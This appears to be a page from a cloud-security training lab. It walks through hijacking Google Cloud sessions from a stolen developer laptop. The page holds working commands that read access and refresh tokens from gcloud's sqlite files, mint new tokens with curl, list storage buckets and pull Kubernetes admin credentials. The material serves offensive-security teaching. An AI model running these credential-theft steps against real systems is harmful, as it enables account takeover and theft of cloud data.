Stealing API Keys and Service Account Tokens

Introduction

OAuth us used in all Google authentication with user accounts and service accounts, browser and SDK's external clients as well as internal compute VMs. These session tokens provide an attacker opportunity to hijack and resue authenticated sessions.

What are we going to cover

We will be covering how session tokens on a Google Cloud admins client environment can be hijacked to gain access to that user's Google Cloud environments. This is a situation where the developer laptop has been stolen.

gcloud stores credentials and tokens in the ~/.config/gcloud folder in sqlite format. We will perform some simple analysis on the credentials and token files and examine what can be abused.

Steps to attack

  • Change to the ~/config/gcloud directory on the student machine.

  • Identify your current gcloud logged in email using gcloud auth list

  • Run the below sqlite3 command to extract the access token for the current user of Google Cloud

sqlite3 access_tokens.db "select access_token from access_tokens where account_id='{your-account-id}';"

  • In the credentials.db there is whole lot of information regarding the current Google Cloud user account, you can view the information by using the below command. The information includes OAuth scopes and a refresh token.

sqlite3 credentials.db "select value from credentials where account_id='{your-account-id}';"

  • Using the information we have got we can now try to create an access token which can be further used to make API calls for other Google cloud resources

curl -s --data client_id=<your-client-id> --data client_secret=<your-client-secret> --data grant_type=refresh_token --data refresh_token=<your-refersh-token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

  • Let's make an API call to check the contents of a buckets. Use the below curl commands for the same.

curl -s -H "Authorization: Bearer <token-generated-from-previous-step>" https://storage.googleapis.com/storage/v1/b?project=<project-name>

curl -s -H "Authorization: Bearer <token-generated-from-previous-step>" https://storage.googleapis.com/storage/v1/b/<bucket-name>/o?project=<project-name>

Bonus attack (Discussion)

Also, if the dev had a kubernetes cluster deployed, we could have downloaded the kubernetes cluster admin credentials and gained access.

gcloud container clusters list --access-token-file=token.txt --project=k8testing-354609
list cluster name

  • Now we will generate the kubeconfig

gcloud container clusters get-credentials k8stest-cluster-1 --access-token-file=token.txt --project=k8testing-354609 --region=us-central1-c

Additional references

No additional references here

PreviousMisconfigurations with Google Cloud IAMNextOSINT against cloud targets

Last updated